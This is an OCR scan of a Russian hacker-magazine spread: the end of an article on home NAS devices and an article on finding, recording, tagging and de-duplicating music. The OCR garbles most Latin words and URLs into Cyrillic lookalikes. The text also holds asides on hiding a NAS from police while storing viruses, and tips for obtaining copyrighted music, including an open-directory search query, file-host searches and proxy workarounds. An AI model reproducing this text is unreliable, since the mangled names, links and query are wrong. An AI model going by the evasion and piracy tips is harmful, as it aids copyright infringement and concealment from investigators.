дам, засидевшимся на старых ветках ядра, 
придется обновиться, потому как поддержка 
І5С5І появилась в версии кегпеі’а 2.6.1 2. 
Удобно и быстро — это, безусловно, хорошо, 
но надежно ли? Да, файлы на сетевом храни- 
лище находятся ничуть не в меньшей безо- 
пасности, чем на типовом ПК. Когда ты в пос- 
ледний раз заглядывал в параметры 5МАРТ 
своего жесткого диска? Лично я уже забыл, 
когда устанавливал подходящую для этого 
утилиту, и обнаружил, что у одного из хардов 
есть серьезные проблемы, увидев заветные 
циферки в админке І\ІА5’а. Тут уже волей-не- 
волей задумываешься отом, чтобы поднять 
на насе РАЮ 1 и зеркально бэкапить данные 
на второй жесткий диск. Даже если один И00 
помрет, данные останутся, а «коробочка» об 
этом сообщит по е-таіі, акустически и визу- 
ально. Атак как І\ІА5 поддерживает«горячую 
замену», то можнодаже не выключать девайс 
из сети, а просто заменить жесткий диск во 
время работы. По этой же причине можно 
начать использовать І\ІА5 с одного диска, 
и в будущем, докупив еще один, сделать из 
них НАЮ-массив без потери данных и даже 
отключения хранилища от сети. 

ДОПОЛНИТЕЛЬНЫЕ 

ВОЗМОЖНОСТИ 

Помимо собственно сетевого хранилища, 
с ІЧАЭ’ом получаешь ряд приятных бону- 
сов. Не вижу теперь ни малейшей причины 
закачиватьторренты на домашнем компе 
и засыпать под шум кулеров. Встроенный в 
І\ІА5торрент-клиент качает файлы круглые 
сутки, складывая их в одно место — и они 
тутже доступны на всех компах. Получаем 
всегда положительный рейтинг на трекерах 
и никакого шума! :] Встроенный медиасер- 
вер ІІРпРЛЭиМА — скорее баловство, чем 
реально полезная функция, особенно для 
людей, у которых, как и у меня, нет банально 
телевизора :]. Хотя знающие люди говорят, 
что встроенный медиасервер отТѵѵопкуМесІіа 
реально рулит. Ну и пусть говорят, прове- 
рить янесмогупривсем желании :) А вот что 
действительно круто, - так это поддержка веб- 



камер, с помощью которых можноустроить 
круглосуточное видеонаблюдение. Можешь 
не обольщаться, доставая запылившийся 
«глазок» от Экуре’а — придется дополнитель- 
но потратиться на полноценную ІР-камеру. Но 
зато приобретя две ѴѴі-Рі камеры, можно мо- 
ниторить все, что угодно: коридор в подъезде 
или машину во дворе. І\ІА5 в этом случае не 
только используется для хранения записи, но 
и для управления. Увы, программисты (ЗІЧАР 
почему-то реализовали отображение картин- 
ки с камеры в компоненте АсбѵеХ. Малотого, 
что работает он только под ІпІегпеІ Ехріогег, 
такеще и подглючивает, выдавая ошибки 
с просьбой обратиться кадминистратору. А 
если я и есть администратор? :] Личноу меня 
от этого появилось стойкое желание взять и 
полностью переписать интерфейс для работы 
с камерой на РІазЬ, чтобы тот работал под 
любым браузером. Стандарт — открытый, АРІ у 
камеры — простое, а запихнуть это все в ІЧА5 
не состав ит труда, там же Ыпих! 

№$, РѴТШ 

И ВСЕ-ВСЕ-ВСЕ 

Скажу больше: в продвинутых ІЧАЭ’ах вообще 
есть встроенный веб-сервер с предуста- 
новленным РНР-интерпретатором и Му5С11_. 
Устраивать из ІЧА5’а абузоустойчивый хостинг 
и ждать гостей в форме не стоит, а вот поднять 
сайт и показывать на нем статистику по 
использованию ЫАЗ’а каждым из пользова- 
телей — вполне можно. Для этого, правда, 
придется поставить сборщик статистики, 
обрабатывающий системные логи. К счастью, 
некоторые производители заботятся о просто- 
те установки на ІЧА5’ы дополнительных моду- 
лей: программы длятехже «кунапов» инстал- 
лятся не сложнее, чем под виндой. Закачав 
с сайта производителя (ЗРКО-пакеты, можно 
в несколько кликов установить клиент для 
еМиІе, интерпретатор РуЮоп, рЬрМуАбтіп и 
ряд других утилит. И хотя количество готовых 
к употреблен ию сборок невелико, такой 
подход позволяетустановить самое глав- 
ное — менеджер пакетов I РОК. С ним-то уж 
точно можно установить все, что душе угодно. 
Я, к примеру, первым делом устанавливаю 
файловый менеджер тс для удобства работы 
с конфигами. А для тех, кому недостаточ- 
но не самого навороченного встроенного 
торрент-клиента, это отличная возможность 
поставить что-нибудь более функциональное 
и продвинутое. Дел на пять минут, тем более 
что активными членами компьюнити давно 
выложены готовые инструкции. Самыеже 
смелые товарищи, располагающие знаниями 
и свободным временем, могут попытаться 
поставить на ІЧА5 любимую *піх-0С :). Сам я с 
учетом большой работы сдругими етЬебсІесІ- 
девайсами порывался установить 55 Н -демон 
для безопасного администрирования. Л ишь 
после всех приготовлений выяснилось, что он 
уже установлен :). 

ЗАЩИТА ДАННЫХ 

Зачем мне понадобился безопасный доступ к 
устройству, рассказывать не нужно: ты и сам 



не раз видел, каклегко снифается открытый 
трафик в сети. В этом плане порадовала 
опция «551-вход» перед авторизацией в ад- 
минке. Дома этим можно пренебречь, но если 
до админки ты пробрасываешь порт на своем 
роутере и подключаешься к нему «извне» че- 
рез Инет, то использовать НТТР5-соединение 
нужно в обязательном порядке. Что касается 
безопасной передачи файлов, то самим ІЧА5 
поддерживаются 5РТР-соединения (551/ 
Т5І_). Но если в сетевом хранилище хостятся 
особенно конфиденциальные данные (ты 
понимаешь, о чем я говорю], рекомендую 
взять пакете ОрепѴРІЧ и через ІРКО развер- 
нуть ѴРЫ-сервер, дабы работать стакими 
файлами исключительно по защищенному 
каналусвязи. Слабым местом во всей схеме 
легко мог бы оказаться сам ІЧА5, но и у него 
есть механизмы для собственной защиты: в 
том числе от 00о5 и перебора паролей. Едва 
ли устройство выдержит атаку стотысячного 
ботнета, но подумай: кому может понадо- 
биться твой домашний ІЧА5? :) Ктомуже, для 
предотвращения сетевых атак можно создать 
набор правил, разрешающих, запрещающих 
или блокирующих ІР-адреса, диапазоны 
ІР-шников или целые подсети, с которых 
осуществляется доступ к накопителю по про- 
токолам 55Н/ТеІпеДНТТР(5]/ЕТР/5МВ/АЕР. 

СПРЯТАТЬ ВСЕ 

Еще любопытная деталь. Девайс можно хоро- 
шенько спрятать дома, так что никакие злые 
дяди из отдела «К» его не найдут :]. А хранить 
при этом на нем всякие пароли, вирусы, их 
сорцы, торренты — все, что душе угодно. 
Вспоминается история, когда в какой-то 
компании елевой бухгалтерией над навесным 
потолком был установлен целый компьютер с 
компрометирующими данными. Подключение 
выполнялось по витой паре, которая была 
прикреплена к специальному натяжному ро- 
лику. Если сотрудники чувствовали, что пах- 
нет жареным, то просто вытаскивали провод 
из свитча — и тоттотчасубирался под потолок 
:). Эх, знали ли бы эти находчивые ребята о 
ІЧА5: и ведь спрятать его проще, и шума ника- 
кого! Параноики безопасности могут вообще 
подключиться к нему через Роѵѵегііпе-адап- 
теры, передавая данные через электрическую 
розетку — тут уж и самим бы накопители не по- 
терять! А если заморочиться еще серьезнее, 
то встроенный контроллер І5С5І позволить 
«вынести» І\ІА5 по Интернету куда угодно! Он 
может находиться у бабушки в другом конце 
Москвы или у брата в Нью-Йорке. 
Единственное, чем может отпугнуть качест- 
венный І\ІА5, — это цена. Достойное «сетевое 
хранилище» с хорошей гарантией стоит де- 
нег. Например, цена ОЫАР Т5-21 9Р со всеми 
описанными фичами составляет порядка 
$500. Аналогичные по возможности моде- 
ли других производителей (хотя их, честно 
говоря, раз-два и обчелся] стоят не меньше. 
Сэкономитьздесь можно, ну разве что купив 
что-нибудь оттого же ОЫАР, носменышей 
производительностью — функционал будет 
тем же.. □С 
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МУЗЫКАЛЬНАЯ 

ЛИХОРАДКА ХАКЕРСКАЯ ЖИЗНЬ 

ПРИПЕВАЮЧИ:) 



СИТУАЦИЯ У МЕНЯ. КАК МНЕ КАЖЕТСЯ. ВПОЛНЕ ТИПИЧНАЯ. МУЗЫКУ 
СЛУШАТЬ ХОЧЕТСЯ. А КАКУЮ - НЕ ВСЕГДА ПОНЯТНО. ГДЕ ВЗЯТЬ 
ТРЕКИ. КОТОРЫЕ ПОНРАВЯТСЯ? КАК СОБИРАТЬ ПЛЕЙЛИСТЫ ПОД 
НАСТРОЕНИЕ? У КОГО УЗНАТЬ. ЧТО СЕЙЧАС ИГРАЕТ ПО РАДИО ИЛИ 
ПРОСТО В МАГАЗИНЕ? И КАК ПРИВЕСТИ В БОЖЕСКИЙ ВИД МИЛЛИОН 
ТРЕКОВ НА ЖЕСТКОМ ДИСКЕ? 



О тношение к музыке у каждого свое. 

Меня хорошийтрекзаряжаетэнерги- 
ей , позволяет полностью погрузиться 
в рабочий процесс, забыв обо всем, 
или, наоборот, отдыхать на полную 
катушку. Но проблема — знатоком музыки я ни- 
когда не был. У меня есть огромное количество 
треков на жестком диске, многие из которых 
— банально мусор. Добавив их в плейлист, 
очень скоро начинаешь плеваться и включать 
что-нибудь проверенное. Атак какстарый 
добрый плейлист переслушан до тошноты, то 
непременно появляется желание отыскать 
что-нибудь новенькое, свеженькое. Но что? 

РАДИО ОНЛАЙН 

Тут-то и пришло осознание: а зачем вообще 
держать музыку на компьютере? Забивать 
голову поиском новых треков в инете, зате- 
рявшихся трЗ'шек на жестком диске, а потом 



составлением плейлистов под разные настро- 
ения — слишком серьезная работа, чтобы 
просто послушать музыку. Но в действитель- 
ности многое уже давно сделано за тебя — в 
виде онлайн-радио. Хочешь рок — будет тебе 
рок! Хочешь фолк — будет фолк. Что угодно — 
на любой вкус и жанр. В самом примитивном 
варианте такое радио мало отличается от 
обычного: заранее составленная сетка веща- 
ния, ди-джеи, та же реклама. Разница в том, 
что таких радиостанций тысячи! Я особенно 
рекомендую сервис АОІ_ Расііо [ тизіс.аоі.сот/ 
гасІіодиісІе/ЬЬ ). на котором доступны каналы, 
начиная от традиционного разбиения на раз- 
личные направления музыки и заканчивая 
каналами исключительно разговорными или, 
например, радио со спортивными транс- 
ляциями. Один клик мыши — и слушаешь 
музыку по настроению. Для воспроизведения 
достаточно одного лишь браузера, а другие 



станции можно слушать через специальные 
утилиты ІСУ Расііо ( ісѵ-гасііо.еп.зо^опіс.сопп ) и 
РагтаРасііо ( ѵѵмѵѵ.гаітеггоіісот ). 

И все-таки, тут ты серьезно завязан на музы- 
кального режиссера радиостанции, который, 
хотя и со знанием дела, но подбирает музыку 
сам. А хочется так — чтобы полностью под себя. 
Поэтому не менее интересен другой вариант, 
когда онлайн-радио представляет собой свое- 
образную социальную сеть, совмещенную с 
огромным количеством музыкального контента. 
Пользователи делятся своими музыкальными 
предпочтениями, ведется статистика про- 
слушиваемых треков — и на этом основании 
строятся индивидуальные плейлисты с учетом 
предпочтений и пожеланий пользователя. 
Чтобы полностью понять и проникнуться идеей 
и тем, насколько классно система работает, ее 
обязательно нужно попробовать. 

Одной из лучших таких сетей является 
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АОІ.ВАОІО: ДЕСЯТКИ КАНАЛОВ 
С МУЗЫКАЛЬНЫМИ НАПРАВЛЕ- 
НИЯМИ НАЛЮБОЙ ВКУС 




СКРОББЛЕР И СТАНДАРТНЫЙ 
ПЛЕЕР ДЛЯ І.А5Т.РМ 




ГРАББИМ МУЗЫКУ С І.А5Т.РМ 
ПРЯМИКОМ В МРЗ, ПРОПИСЫВАЯ 
ТЕГИ И ЗАКАЧИВАЯ ОБЛОЖКИ 
АЛЬБОМОВ 



О ЪѴо«м)ег*Нэге КгеапЫпд АіхЯо Кесогй«г(ипгедЫеге4) — X 

0 ? л*) 

«•«кд ал Ргтт $*ттгід» I/ ^ 




ЗАПИСЬ ВСЕГО АУДИОПОТОКА 
С РАЗБИЕНИЕМ НАТРЕКИ 



І-азит. Этот сервис начинался как проект 
аудиоскробблера и лишь потом перерос в 
самое известное онлайн-радио. Понятие 
скробблинг подразумевает, что пользователь 
передает на специальный сервер всю-всю 
статистику о прослушиваемых композици- 
ях: сколько раз и что слушал. В результате 
получается огромная база, предоставляющая 
возможность строить цепочки «похожести» 
композиций. В этом-то и заключается глав- 
ный плюс таких сервисов, как ЕазГ'Гт: задай 
ему направление, скажем, рок, и исполни- 
теля, например, ВеаНез — и он не будет до 
умопомрачения проигрывать только ВеаНез, 
а предложит тысячи исполнителей и компо- 
зиций подходящей направленности. Лучшего 
способа открыть для себя новых исполните- 
лей, по-моему, не существует! 

НТО ТАКОЕ СКРОББЛИНГ? 

На основе анализа статистики прослушива- 
ний пользователям индивидуально подби- 




ИЩЕМ МУЗЫКУ ВКОНТАКТЕ 



раются и демонстрируются: рекомендуемые 
сайтом к прослушиванию музыкальные треки, 
популярные у схожих по вкусам слушателей 
(степень «похожести» при подборе можно 
регулировать]. А также — персональные 
страницы участников с похожими вкусами 
(эти пользователи считаются «соседями» 

— англ. N еід Ь бои гб] . Именно поэтому скроб- 
блинг интересно использовать еще и для 
того, чтобы находить что-то новое для себя. 
Включить его несложно. При прослушива- 
нии радио через онлайн-сервис статистика 
ведется автоматически. Но чтобы собирать 
статистику с обычных плееров вроде ѴѴіпатр, 
необходимо скачать и установить в систему 
скробблер ( Іазііт/сіоѵѵпіоасі ]. После установ- 
ки он проверит, какие проигрыватели есть 
в системе, и предложит установить плагины 
для бооЬаг2000, іТипез, ѴѴіпатр, ѴѴіпбоѵѵз 
Месііа ріауег. Впрочем, это не значит, что 
скробблинг доступен только в этих плеерах. 
Например, ЭопдЬігб не зря славится движком 
от Рігебох'а , а потому расширяем за счет пла- 
гинов, в том числе и для поддержки переда- 
чи информации на скробблинг-сервер. Сами 
проигрыватели или плееры вроде іРоб ведут 







ИСПОЛЬЗУЯ СПЕЦИАЛЬНЫЕ МО- 
ДИФИКАТОРЫ, ИСКАТЬ МУЗЫКУ 
МОЖНО ВПОЛНЕУСПЕШНО И 
ЧЕРЕЗ 60061-Е 



внутреннюю статистику по воспроизведению 
треков, которую скробблер предложит загру- 
зить на сервер. Некоторые любят помериться 
показателем «количество воспроизведенных 
треков»: при должном желании можно поста- 
раться оставить хвастунов не удел, подпра- 
вив статистику в локальном плеере (простой 
вариант] или в момент отправки на сервер 
(вероятно, вариант посложнее]. 

АЛЬТЕРНАТИВЫ ЬАЗТ.РМ 

Все бы замечательно, но с марта этого года 
сервис І_а5ит стал платным. Использовать 
скробблер, общаться с людьми, закачи- 
вать обложки альбомов и информацию об 
исполнителе по-прежнему можно ітее, а вот 
за прослушивание треков — придется пла- 
тить денежку. Кроме тех, кто живет в США, 
Германии... и злыдней, которые используют 
прокси из этих стран. Я для себя давно 
решил, что $3 — а именно столько стоит 
месячная подписка на ГазТЗт — пустяковые 
деньги за качественный сервис. С другой 
стороны, нетрудно найти бесплатную альтер- 
нативу. Стоит обратить внимание на следую- 
щие проекты: ѵѵѵѵѵѵ.і теепп. сот , ѵѵѵѵѵѵ.беегег. 
сот . ІізІеп.дгооѵезЬагк.сот . ѵѵѵѵѵѵ.рІаѵІігГсот . 



ПОЛЕЗНЫЕ ПРОГРАММЫ В ХОЗЯЙСТВЕ 



Міпііугісз ( мѵѵѵѵ.сгіпЩоІІ.сот ]. Если хочешь, чтобы с любой 
проигрываемой в плеере песней отображались ее слова, эта 
программа для тебя. Утилита совместима с 21 разными плее- 
рами и сама подкачивает лирику из инета. 

Рапсіот МіхТаре Макет ( ѵѵѵѵѵѵ.бопаСопсобег.сот/ЭоЙѵѵаге/ 
Зеесйіпд/МіхТаре ]. Когда нужно собрать плейлист из случайных 
композиций, лучше всего делать это с помощью МіхТаре Макет а. 
Задай общую продолжительность или, например, объем в 700 Мб, 
чтобы влезло на диск, и он сам подберет композиции. 



Ріооіа ( ѵѵѵѵѵѵТІооІа.сот І и ѴатіІросІ ( ѵѵѵѵѵѵ.ѵатіросі.сот ]. 
Альтернативные іТипез'у программы для управления іРосГом. 
РідЫМагк Аисііо Апаіуіег ( аисІіо.гідЬітагк.огд ]. Этот бенчмарк 
для звуковой карты проигрывает десяток тестовых звуковых 
сигналов, записывает и далее сравнивает с оригиналом, 
чтобы сказать, насколько плоха твоя звуковуха. 

2іеросІ+ ( ѵѵѵѵѵѵ.гіеросі.сот ). Подкаст-аггрегатор выгодно отли- 
чается от многих других программ хотя бы тем, что может 
автоматически закачивать подкасты на твой плеер. 
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> іпіо 

• Едва ли кто-то 
незнаком с тем, что 
уровень звука у раз- 
ных трЗ-композиций 
сильно различает- 
ся. Когда одну еле 
слышно, другая 

при той же самой 
громкости начи- 
нает орать так, что 
мало не покажется. 
Выровнять уровень 
быстро сможет 
бесплатная утилита 
МРзбаіп [ трЗдаіп. 
зоигсеіюгде.пеі ]. 

• Если увидишь му- 
зыку в формате ЕЕАС, 
не пугайся. Это Егее 
Боззіезз Аисііо Собес, 
то есть — свободный 
от потерь кодек, кото- 
рый набираетболь- 
шую популярность. В 
отличие от кодеков с 
потерями Ооо ѴогЬіз и 
МРЗ, ЕЕАС не удаляет 
никакой информации 
из аудио-потока и 
подходит для прослу- 
шивания музыки на 
высококачественной 
звуковоспроизводя- 
щей аппаратуре. 




> ѵѵагпіпд 

Нелегальная закачка 
музыки, равно какее 
распространение, 

— дело подсудное. 
Помни об этом! 




> сЫ 

Найти в инете упо- 
мянутые утилиты 
несложно, но все 
разом лежаттолько 
в одном месте — на 
нашем 0Ѵ0. 



Ми$Шге ѵі Тееі (геѵ,50) 


ІЭШШ 


I Кайіо; N11- 








зип В ® В Ѳ И 


КЯ Р&уюд 






еотеШІпд 










О 






ДгШі 


Зогщ 


АІЪит 








МПЛеаІ. Мѳгѵпіу 


Про Джакса ((еаі №гѵпі# 


Шаг В Сторону 


А 






МТБ&І-ВѴ 


Любовь без взаимности 


Даже не думай 1 








ЫТЕ 


Шаге сторону 


Шаг в сторону 








МТБ 


Мой малышь, я с тобой 


Упкооѵлі аіЬит 








ипкпочѵп агіігі 


ипкпсотп зопд 


Упкпоѵѵп аіЬит 







РЕДКАЯ УТИЛИТА ДЛЯ ПОИСКА МУЗЫКИ. 
ПОКА РЕДКАЯ...:) 




ад Вези И 



Апізі тііе Тіпд Тіпдз 
тиіе 5Ьи1 ІІр АпО 1_еІ 
Ме Оо 

ІаЬеі Бону ВМО Мизіс 
Епіегіаіптепі УК 
итііесі 

Аіьит ѴѴе ЗіаПесі 



5НА2АМ Ю ДЛЯ МОБИЛЬНИКАРАСПОЗНА- 
ЕТ ЛЮБОЙ ТРЕК«НАСЛУХ» 



ѵѵѵѵѵѵ. дгооѵезб а гк. сот . ѵѵѵѵѵѵ. тіхіа ре .те . а также не рабо- 
тающие без ухищрений с прокси ѵѵѵѵѵѵ. зроШл/. сот и ѵѵѵѵѵѵ. 
рапбога.сот . 

ЗАПИСЬ МУЗЫКИ 

Благодаря БазЕІт, у меня исчезла музыка с компа, но 
вот с плеером и магнитолой такой фокус не выйдет. 
Помнишь, как раньше — слушаешь на приемнике 
радио и записываешь любимые песни на кассету. 

Так и теперь, только вместо ЕМ — радио цифровое. 
Сложно удержаться и не сохранить себе на плеер или 
диск любимый трек. Например, чтобы послушать в 
машине. Одной из первых утилит для записи треков, 
проигрываемых в текущий момент на БазЕІт, Рапбога 
и других аналогичных сервисах, была Ргее тизіс 2 ІІІа 
[ ѵѵѵѵѵѵТгеетизісгіиа.сопп ). которая интегрировалась с 
браузером. Но у этой тулзы был неоспоримый недо- 
статок — каждый трек приходилось сохранять вручную. 
Позднее для БазІі.Ет энтузиасты разработали продвину- 
тые утилиты вроде БазіБЬагр [ ІазІзЬагр.еп.зо^опіс.сопп ) 
и ТЬеБазіРіррег [ іЬеІазіхіррег.сот ). предназначенные 
для автоматического граббинга музыки с онлайн- 
станции. Сохранялись не только треки в МРЗ, но и теги, 
и обложка альбома — надо лишь указать работающий 
аккаунт БазЕі'пп. Самым же универсальным сред- 
ством для записи МРЗ, которому вообще все равно, 
откуда воспроизводится музыка, является программа 
Бігеатіпд Аисііо Ресогбег ( ѵѵѵѵѵѵ.ѵѵопбегзЬаге.сот ). Для 
захвата музыки в систему устанавливается виртуальная 
звуковая карта, пропускающая весь воспроизводимый 
поток через себя, записывая его. Прога определяет 
паузы между треками и таким образом нарезает запись 
на разные файлы. Досада в том, что программа рас- 
пространяется на платной основе. В качестве бесплат- 
ной альтернативы можно взять известный звуковой 
редактор Аибасііу [ аибасіІѵ.зоигсеЬгде.пеІ: ]. который 
также записывает весь поток в файл, а отсутствующую 
функцию «авто-нарезки» файлов компенсировать с 
помощью трЗОігесіСиІ [ трезсЬЗ.беІ .сс ). Функция авто- 
матического распознавания тишины отлично разрежет 
многочасовую запись на отдельные треки. 

Я же всегда поступал по-другому, устанавливая для 
своего плеера {ооЬаг2000 [ ѵѵ\л/ѵѵ.ФоЬаг2000.огд 1 плагин 
іюо-іазібітщгабі. Имея возможность управлять прослуши- 
ванием радио и поиском прямо из любимого плеера, и, 
к тому же, тут же осуществлять запись в нужную папку, 

— я считаю это одним из самых удобных вариантов. 
Установил еще плагин — и уже слушаю ЭЬоЮазІ-радио, 
одновременно записывая треки в отдельные папочки по 
трекам. 



ГДЕ НАЙТИ МУЗЫКУ? 

И все-таки, на записях с радио далеко не уедешь. Как 
найти треки полюбившегося исполнителя (БазЕ-Ет, при- 
вет!], кроме как в онлайн-магазине? Конечно, мы не 
берем в расчет закачку файлов с варезных портов и тор- 
рентов — в конце концов, это противозаконно. Поэтому 
приведу здесь несколько других ухищрений пользовате- 
лей, но и стоит иметь в виду, что правообладатели едва 
ли будут рады их использованию. 

1. боодіе. Раз уж говорят, что через Гугл можно найти все, 
отчего ж не использовать его для поиска нужного трека. 
Умельцы давно поняли, что запросы аля «крутая песня в 
трЗ» стоит оставить ушастым пользователям, а поэтому 
применяют всю силу языка запросов поисковика. Особые 
успехи достигаются, когда поиск осуществляется по 
листингам открытых директорий, то есть папок, в которых 
нет Ы:т -документе в для отображения, но навалена куча 
файлов. Сами листинги можно искать по ключевым сло- 
вам «іпбех оП>, «[аз! тобібеб», «рагепГ оі» в названии (тег 
<Ше>] документа. Остается лишь задать наличие на стра- 
нице одного из музыкальных расширений (т рЗ Іѵѵгтта I одд] 
и исключить из результатов поиска все динамические 

и статические страницы (нам нужны только листинги, 
составленные веб-сервером]. В конечном итоге запрос 
будет выглядеть примерно так: 

іпЕіЕІе : іпсіех . оН +" ІазЕ тосііЕіесб" +" 
рагепЕ сІігесЕогу" + (трЗ I шаа I одд) 

+ " %Название исполнителя% " -ЬЕш -ЕШтІ -ріір 
-азр 

Существует даже сервис ѵѵѵѵѵѵ. д 2р. о гд . который поможет 
составить правильный запрос. 

2. По РарібзЬаге и другим файлообменникам. 

Сейчас мало кто решается размещать на своих серверах 
большие файлы и вообще, все, что генерирует боль- 
шой трафик — а музыку, само собой, качают ого-го-го. 
Вместо этого файлы распространяются через р2р-сети 
и, в особенности, ІюггепБы и активно выкладываются на 
различных файлообменных сервисах, подкармливая их 
владельцев, зарабатывающих большие деньги на прода- 
же аккаунтов, позволяющих скачивать файлы без ограни- 
чений. А раз уж на файлообменниках так много добра, то 
почему не поискать там то, что нужно. Правильные ребята 
давно сварганили специальные сервисы для поиска 
файлов по ВарісІзЬаге.сопп, МедаирІоасЕсот и миллиону 
других сервисов. Их очень много — достаточно ввести в 
Гугле « га р і сі 5 Гі а ге зеагсб» и удивиться результату. Одним 
из первых в списке результатов и по-настоящему рабо- 
тающим ресурсом является гарісШЬга гѵ.сот . 
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УДАЛЯЕМ ДУПЫ ИЗ КОЛЛЕКЦИИ МРЗ-ШЕК 



3. «ВКонтакте» и других социальных сетях. 

Сколько раз уже замечал, каку человека 
открыта вкладка «ВКонтакте», но он не рисует 
граффити на странице друзей и не просматри- 
вает фотки. Нет, просто у него запущен плеер, 
проигрывающий огромное количество музыки, 
которую пользователи залили на серверы 
социальной сети. Пример характерен вовсе 
не для одного «ВКонтакте» — точно такая 
же ситуация и во многих других социальных 
сетях. Для поиска по базе социальных сетей 
существует немало онлайн-сервисов, но рабо- 
тают они в последнее время крайне плохо 
— «ВКонтакте» банит за большое количество 
запросов. Но зато отдельные приложения, 
которые пользователь устанавливает себе 
на компьютер, работают «на ура». Одной из 
наиболее продвинутых программ является 
ЬіІ:Ьиске1:.огд/А2К/ѵр[аѵег . которая ищет треки 
из «ВКонтакте», непрерывно воспроизводит, 
подкачивает из инета обложки альбомов, а 
также расширяется за счет плагинов. 

4. Поисковые программы. 

Мизібге ( ЬНрУ/собе.доодІе.соітѴр/тизібге ). 
Изначально это была простая программа 
на РІех/АІ Р, которая искала музыку на паре 
отличных ресурсов, собирала информацию 
о похожих песнях и исполнителях с НазВІт 
и составляла по ней плейлисты. Взявшись 
за новую версию программы, автор решил, 



что теперь у пользователя должна быть воз- 
можность самому добавлять свои поисковые 
сайты; названия треков должны читаться 
из ЮЗ-тегов до загрузки файлов, а также 
должен быть режим непрерывного радио, 
закладки любимых треков, ну и всякие штуки 
по мелочам. Главная фишка программы 
— умение искать по заданным пользовате- 
лем сайтам. В данный момент реализован 
только сизіот-тип сайта — поиск по сайту с 
помощью сформированного пользователем 
регулярного выражения. Все это безобра- 
зие работает на АбоЬе АІВ, и это значит, что 
оно одинаково хорошо (и одинаково плохо) 
работает и под виндой, и под макосью, и под 
линуксом. В любом случае, даже «из короб- 
ки» с Мизібге можно найти очень и очень 
многое. Проверено лично. 

НТО СЕЙЧАС ИГРАЕТ? 

В динамиках играет классная мелодия, 
хочется обязательно послушать ее еще раз, 
но... ты не знаешь, что это за композиция. 
Знакомая ситуация? Многие радиостанции 
сейчас даже предоставляют 5М5-сервис: 
отправь сообщение с указанием времени и 
получишь в ответе название композиции. 

Мы ни за что платить не будем, а возьмем 
на заметку сайт ѵѵѵѵѵѵ.тогкѵаіт . о котором 
уже когда-то рассказывали в нашей рубрике 



ѴѴѴѴѴѴ2. Мощные серверы этой системы запи- 
сывают «в цифру» эфир большинства сто- 
личных радиостанций, так что всегда можно 
прослушать, что было в пятницу 16 октября в 
19-00. Но главная фишка в том, что для каж- 
дой звучащей композиции осуществляется 
распознавание по огромной базе «музыкаль- 
ных слепков». В результате, запомнив время, 
когда играла композиция, и радиостанцию, 
ты всегда сможешь узнать название, вос- 
пользовавшись тозкѵаіт . 

Впрочем, подобную «распознавалку» куда 
удобнее всегда иметь при себе. Именно 
поэтому обязательным МизПЬаѵе для моего 
телефона стала прога БЬагат Ю ( 
зЬагат.сот ). Услышав классную мелодию 
из динамиков в кафе или магазине, я неред- 
ко тянусь за телефоном, чтобы запустить 
«Шазам» и записать небольшой отрывок 
произведения. Дальше прога отправляет его 
на сервер, где производится идентификация, 
после чего отображает результат на экране. 
Название трека, исполнитель и обложка 
альбома — магическая штука, которая не 
перестает удивлять моих друзей и знакомых. 
Версия программы есть для платформы 
ВутЬіап, і РГіопе, Ооодіе АпбгоісІ и ВІаскЬеггу. 
На самом обычном телефоне (главное, чтобы 
у него была поддержка МЮР 2.0) запустится 
другая аналогичная программа, разработан- 
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ная ьопу ЫПС550П — ТгаскЮ. Впрочем, даже 
если и она не заработает, существует еще 
один, последний вариант. Диктофон есть на 
любом телефоне, а это значит, что, записав 
отрывок композиции, можно скормить ее 
онлайн-сервису Аисііоіад.іпію или обычной 
виндовой программе Типаііс [ ѵѵѵѵѵѵ.ѵѵіШЬііз. 
сотАипабс ). 

КАК НАВЕСТИ ПОРЯДОК В ТЕГАХ? 

Интересно было бы собрать статистику со 
всех пользователей в России и вычислить 
среднюю величину МРЗ-шек, которые каж- 
дый хранит на своем компе. Любопытные 
данные для звукозаписывающих компаний. 

:] По себе знаю — держать в порядке такое 
обилие музыки чрезвычайно сложно, и если 
поначалу еще предпринимаешь попытки 
сортировать файлы вручную, то через неко- 
торое время приходит четкое осознание, 
что это дохлый номер. Отчасти выручают 
Тад&Репате [ ѵѵѵѵѵѵ.гоАроіпІег.сотАг.Ьіпп І и 
целая свора аналогичных программ, которые 
умеют переименовывать файлы РіІеІ.трЗ, 
кгиІауа_теІосІіа2.трЗ, ааа.трЗ в членораз- 
дельные названия с указанием исполнителя 
и трека, извлекая данные из тегов или же, 
напротив, заполняя информацию в ібѵі и 
ібѵ2, если та содержалась в названии файла. 
Причем, что важно, ни одна из известных 
мне программ не умеет автоматически рас- 
познавать, в какую сторону осуществлять 
преобразование — а идея-то хорошая! 
Лучиком света среди однообразных про- 
грамм стоит МеІаЮббег [ ѵѵѵѵѵѵ.іиппіпезсепсе- 



зоЛѵѵаге.огд ). которая умеет определять 
названия композиций на слух. С каждой 
композиции снимается слепок, который 
отправляется на сервер, где производится 
его идентификация. Эдакий акустический 
бпдегргіпбпд. Для большинства западных 
композиций система работает на ура: к 
счастью, используемая база МизісВгаіпг 
огромна. Также для каждой композиции 
можно закачать текст песни, воспользовав- 
шись данными с Іѵгісѵѵікі.огд . Ктомуже, про- 
грамма может подтянуть из Сети огромную 
базу с тегами по исполнителям (в сжатом 
виде — около 200 Мб), которая может быть 
очень полезна при ручном заполнении тегов. 
Если это, конечно, потребуется, потому как 
МеіаЮССег даже позволяет писать скрипты, 
максимально автоматизирующие процесс. 

КАК УДАЛИТЬ ДУБЛИКАТЫ? 

Разгребая завалы музыки, несложно заме- 
тить, что одна и та же композиция сначала 
встречается здесь, потом там, а затем 
оказывается еще в свежем сборнике, толь- 
ко что слитом с торрентов. Большинство 
утилит, бьющих себя в грудь и обещающих 
удалить все дубликаты, способны разве что 
сравнить размер файла, его названия, а 
также теги, прописанные в ібѵЗ. Нет ничего 
удивительного, что эффективность такого 
подхода хромает — теги все оформляют 
по-разному, а два одинаково закодиро- 
ванных файла — нынче большая редкость. 
Самый эффективный способ найти и уда- 
лить дубликаты — опять же, проверить их 



«на слух». У программы Бітііагііу [ ѵѵѵѵѵѵ* 
тизіс-БІтіІагіІѵ.сот ] как раз есть музы- 
кальный талант. В проге реализовано 
несколько способов поиска одинаковых 
композиций и основным, безусловно, 
является поиск по содержимому. Впрочем, 
даже если взять поиск дупов по тегам, то и 
здесь есть, где разгуляться. Задав уровень 
чувствительности, можно найти прибли- 
зительно похожие теги — на случай, если 
кто-то где-то сделает ошибку, перепутает 
местами название и исполнителя и т.д. 
Расправиться с дубликатами в плейлисте 
позволяет также ЬеаТипез [ ѵѵѵѵѵѵ.ЬеаІипез. 
сот ). Эта замечательная программа, кста- 
ти говоря, также выполняет акустический 
